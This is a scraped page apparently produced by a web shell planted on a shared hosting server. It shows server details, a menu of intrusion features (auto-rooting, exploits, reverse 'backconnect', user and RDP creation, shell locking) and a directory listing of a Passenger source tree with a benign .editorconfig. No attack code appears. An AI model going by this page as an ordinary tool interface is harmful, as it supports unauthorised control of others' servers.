Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.11
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
cpanel /
ea-ruby27 /
src /
passenger-release-6.1.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.externalToolBuilders
[ DIR ]
drwxr-xr-x
?;
.github
[ DIR ]
drwxr-xr-x
?;
.settings
[ DIR ]
drwxr-xr-x
?;
.vscode
[ DIR ]
drwxr-xr-x
?;
bin
[ DIR ]
drwxr-xr-x
?;
build
[ DIR ]
drwxr-xr-x
?;
dev
[ DIR ]
drwxr-xr-x
?;
doc
[ DIR ]
drwxr-xr-x
?;
images
[ DIR ]
drwxr-xr-x
?;
man
[ DIR ]
drwxr-xr-x
?;
packaging
[ DIR ]
drwxr-xr-x
?;
resources
[ DIR ]
drwxr-xr-x
?;
src
[ DIR ]
drwxr-xr-x
.clangd
102
B
-rw-r--r--
.cproject
7.89
KB
-rw-r--r--
.editorconfig
2.38
KB
-rw-r--r--
.gitattributes
120
B
-rw-r--r--
.gitignore
742
B
-rw-r--r--
.gitmodules
795
B
-rw-r--r--
.project
1.1
KB
-rw-r--r--
CHANGELOG
190.59
KB
-rw-r--r--
CODE_OF_CONDUCT.md
3.31
KB
-rw-r--r--
CONTRIBUTING.md
16.47
KB
-rw-r--r--
CONTRIBUTORS
1.92
KB
-rw-r--r--
Gemfile
405
B
-rw-r--r--
Gemfile.lock
1.21
KB
-rw-r--r--
INSTALL.md
329
B
-rw-r--r--
Jenkinsfile
10.26
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
Passenger.sublime-project
205
B
-rw-r--r--
README.md
3.17
KB
-rw-r--r--
Rakefile
2.88
KB
-rw-r--r--
Vagrantfile
2.49
KB
-rw-r--r--
configure
287
B
-rwxr-xr-x
package-lock.json
264.88
KB
-rw-r--r--
package.json
1.08
KB
-rw-r--r--
passenger.gemspec
2.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .editorconfig
# http://EditorConfig.org root = true [*] end_of_line = lf charset = utf-8 [bin/*] indent_style=space indent_size=2 trim_trailing_whitespace = true [dev/*] indent_style=space indent_size=2 trim_trailing_whitespace = true [doc/*.txt] indent_style=tab indent_size=4 [doc/*/*.txt] indent_style=tab indent_size=4 [*.cpp] indent_style = tab indent_size = 4 trim_trailing_whitespace = true insert_final_newline = true [*.c] indent_style = tab indent_size = 4 trim_trailing_whitespace = true insert_final_newline = true [*.h] indent_style = tab indent_size = 4 trim_trailing_whitespace = true insert_final_newline = true [*.hpp] indent_style = tab indent_size = 4 trim_trailing_whitespace = true insert_final_newline = true [*.rb] indent_style = space indent_size = 2 trim_trailing_whitespace = true [*.py] indent_style = tab trim_trailing_whitespace = true [*.cxxcodebuilder] indent_style = space indent_size = 2 trim_trailing_whitespace = true [config.ru] indent_style = space indent_size = 2 trim_trailing_whitespace = true [Rakefile] indent_style = space indent_size = 2 trim_trailing_whitespace = true [Gemfile] indent_style = space indent_size = 2 trim_trailing_whitespace = true [Jenkinsfile] indent_style = space indent_size = 2 trim_trailing_whitespace = true [*.js] indent_style = tab indent_size = 4 trim_trailing_whitespace = true [src/nginx_module/*.c] indent_style = space indent_size = 4 [src/nginx_module/*.h] indent_style = space indent_size = 4 [src/nginx_module/*/*.c] indent_style = space indent_size = 4 [src/nginx_module/*/*.h] indent_style = space indent_size = 4 [src/cxx_supportlib/vendor-modified/libev/*.c] indent_style = space indent_size = 2 trim_trailing_whitespace = false [src/cxx_supportlib/vendor-modified/libev/*.h] indent_style = space indent_size = 2 trim_trailing_whitespace = false [src/cxx_supportlib/vendor-copy/libuv/src/*.c] indent_style = space indent_size = 2 trim_trailing_whitespace = false [src/cxx_supportlib/vendor-copy/libuv/src/*.h] indent_style = space indent_size = 2 trim_trailing_whitespace = false [src/cxx_supportlib/vendor-copy/libuv/src/unix/*.c] indent_style = space indent_size = 2 trim_trailing_whitespace = false [src/cxx_supportlib/vendor-copy/libuv/src/unix/*.h] indent_style = space indent_size = 2 trim_trailing_whitespace = false [resources/templates/standalone/config.erb] indent_style = space indent_size = 4 trim_trailing_whitespace = true
Close